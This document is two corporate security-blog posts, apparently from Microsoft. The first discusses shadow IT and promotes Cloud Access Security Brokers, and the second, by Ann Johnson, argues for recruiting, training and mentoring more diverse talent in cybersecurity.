There are a number of reasons why employees use non-approved SaaS applications, and there are very good reasons IT wants to limit it. To reach a point where both sides are working together, it’s important to understand both perspectives.

Through the business lens: Employees look to drive results first

Organizations are in very competitive environments with demanding business objectives and far-reaching goals. Employees are under intense pressure to deliver results and often turn to non-approved apps to help them do their jobs quicker and more effectively.

Here are some of the common responses employees give when asked about shadow IT:

“I’m just more comfortable using a different app from the IT approved one. I don’t want to have to relearn a new program just to do the same thing.”

“All of my external partners use a different app for file transfer. I can’t make everyone start using our solution, so I need to be able to use what they use.”

“The timelines on this project just don’t allow for the time it takes to get IT approval. It’s faster for me to just download and install the app myself.”

While they may have good intentions, many employees don’t fully understand the security risks associated with using non-approved applications, devices, or networks.

Businesses need to have visibility and control to ensure data compliance.

Through the IT lens: Shadow IT creates blind spots that can increase risk

Shadow IT creates a difficult challenge. Organizations expect IT to empower employees to do their jobs more effectively, while at the same time ensuring the security and compliance of sensitive data.

Without a detailed picture of the SaaS apps employees are using, IT cannot provide this security. On the other hand, blocking shadow IT inevitably leads to employees finding ways around the restrictions.

Some of the concerns IT teams encounter when faced with shadow IT are:

“I need to keep our organization’s data safe. If I don’t know what employees use or how they use it, those unknowns seriously jeopardize my ability to do so.”

“We have an approval process in order to reduce security compromises. Before we approve an app, we have to test and vet each app to ensure it meets not only our organizational requirements, but any industry regulatory or compliance requirements.”

While complete visibility might never be attainable, there are certainly steps IT can take to more effectively manage the blind spot shadow IT creates. One of those steps is to consider a Cloud Access Security Broker.

Cloud Access Security Brokers offer a compromise

A Cloud Access Security Broker (CASB) is a technology that helps you meet the needs of both IT and the business. It helps reduce the risk non-approved applications and services pose to your organization. Shadow IT is unlikely to be eradicated within organizations, so this is an important way to address the security gaps it creates.

CASB solutions help you to:

  • Get a detailed picture of the cloud apps and services your employees use
  • Control data in apps with granular-level policies
  • Protect your data and SaaS apps from advanced threats
  • Investigate users and their interactions with apps

The right CASB solution allows you to bring shadow IT into the light, giving employees the productivity tools they need, while helping maintain the security and compliance your company demands.

To better understand shadow IT and how CASBs operate, check out our new e-book, “Bring Shadow IT into the Light.”

How to solve the diversity problem in security
Microsoft Secure Blog Staff, 2017-03-30

This post is authored by Ann Johnson, Vice President, Enterprise Cybersecurity Group.

I was in the midst of composing this blog on diversity in cybersecurity when a Fortune article on Women in Cybersecurity found its way to my LinkedIn feed. It was promoted to me by a man I know and respect. As I reflected on the content of this piece in the context of my post, a key detail leapt out at me. It was a male member of the cybersecurity industry advocating for women in this instance. So, what does it all mean?

I have enjoyed a technology career to date spanning 30 years. I have been fortunate to encounter amazing mentors along the way, female and male, many of whom I met very early in my career. My professional experiences, good and bad, successes and failures, have shaped who I am today. Through those experiences, I have become convinced we need more diversity in cybersecurity. Whilst there are no easy answers to solving this problem, understanding some of the root causes will help inform our decisions.

We need to hire and mentor more women and diverse talent in security not only because it is the right thing to do, but also because gaining the advantage in fighting cybercrime depends on it. If we do not diversify the cyber talent pool:

  • We are not likely to fill the estimated 1M+ global cybersecurity openings.
  • We will continue to engender group thinking among a few “experts” with similar backgrounds. Remember: diversity is not just about the color of our skin, gender, religious or ethnic background, it is also about being surrounded by people whose varied experiences contribute new ideas to problem solving.
  • We become weaker relative to our adversaries. Cybercriminals will continue to exploit the unconscious bias inherent in the industry by understanding and circumventing the homogeneity of our methods. If we are to win the cyberwars through the element of surprise, we need to make our strategy less predictable.

I firmly believe most bias is unconscious. Certainly, conscious bias exists, but in my view the majority are doing the best they can with the background and experiences that have shaped their lives. We tend to mentor and hire people we know and trust. If our professional sphere is limited to a certain segment of the population, then the hiring pool simply replicates the makeup of our network.

The cybersecurity industry has historically been predominantly male for a few reasons:

  • Women pursue STEM education at a lower ratio than men.
  • Many cybersecurity professionals come from traditional law enforcement or investigative backgrounds, and these industries are currently male majorities.
  • Women are reluctant to pursue careers in cyber because they don’t see themselves reflected in the employee pool, thereby creating a self-perpetuating cycle.

Given the serious implications the lack of diversity has for cybersecurity, how do we attract, recruit, mentor and retain a broader, more inclusive workforce? The answer lies with a programmatic approach where we continuously measure effectiveness and adapt accordingly. The steps below, while not easy, and certainly not exhaustive, are imperative and urgent. The bad actors are well-funded and organized – innovating their methods, and growing their numbers – certain to become a permanent fixture of our digital future. Our ability to remain a step ahead is dependent on evolving our tools and talent through the following:

  • College recruiting. This is a must. Microsoft has a robust college hiring program and we make a conscious effort to include this talent on our security teams. We invest heavily in intern opportunities and new graduate hiring programs. We are not the only company to do so, but we need more firms to join us with a commitment to well-executed and measured programs. We are also building a relationship with the Security Advisor Alliance, which runs meaningful programs at both the high school and college levels, to provide cybersecurity education and industry recruiting.
  • Participation in our own rescue. I heard this expression a few years ago in a training class, and it stuck. The cybersecurity industry created this diversity problem, so we bear the onus to find a solution. We need to make training and retraining programs available to technical as well as non-technical talent, making cybersecurity a viable path. Including training options for those with non-technical degrees is key to addressing our well documented talent shortage in cyber. I know that this can work first hand. I was law school-bound with a degree in Communication and Political Science, when I decided that a technology career was more apt. By spending time on the go-to-market side and taking advantage of every vendor program available to further my technical training, I fulfilled my desired path.
  • Participation in organizations that promote diversity in cybersecurity. There are many who are tackling this initiative, but two that come to mind are: International Consortium of Minority Cybersecurity Professionals and #brainbabe.
  • Education on unconscious bias. I mentioned earlier that I believe most people are not aware of the language or behavior that implies bias. There is no intent to offend on their part. They are simply reflecting their life experience. Unfortunately, if you are a diverse person who works in these environments, you may not feel welcomed and often you choose to leave. You certainly won’t recommend these companies or work environments to your peer group – thus furthering the diversity gap. It is imperative that we educate about unconscious bias to address this issue.
  • Realization that all of us are smarter than one of us. Our CEO Satya Nadella says this on a regular basis to remind us that working through and with teams makes us all better. And working with team members that bring diverse perspectives and thoughts can only elevate team creativity and effectiveness.
  • Tailored mentorship. Recruitment and training programs alone will not change the cybersecurity employee landscape short-term. Diverse talent needs to hear from group members who have succeeded in cyber. Mentors that are trained and incented to grow group diversity are key to breaking stereotypes and misconceptions, as well as fostering optimism in those who would elect to pursue cybersecurity careers.

We will only solve the diversity problem as an industry. The industry’s conferences are all tackling diversity through meaningful dialogue which will hopefully lead to further investments. It is time for everyone to embrace a cybersecurity future where all who feel they can make a positive impact are welcomed, and our ability to recruit and retain these persons is free of the caveats and excuses of the past.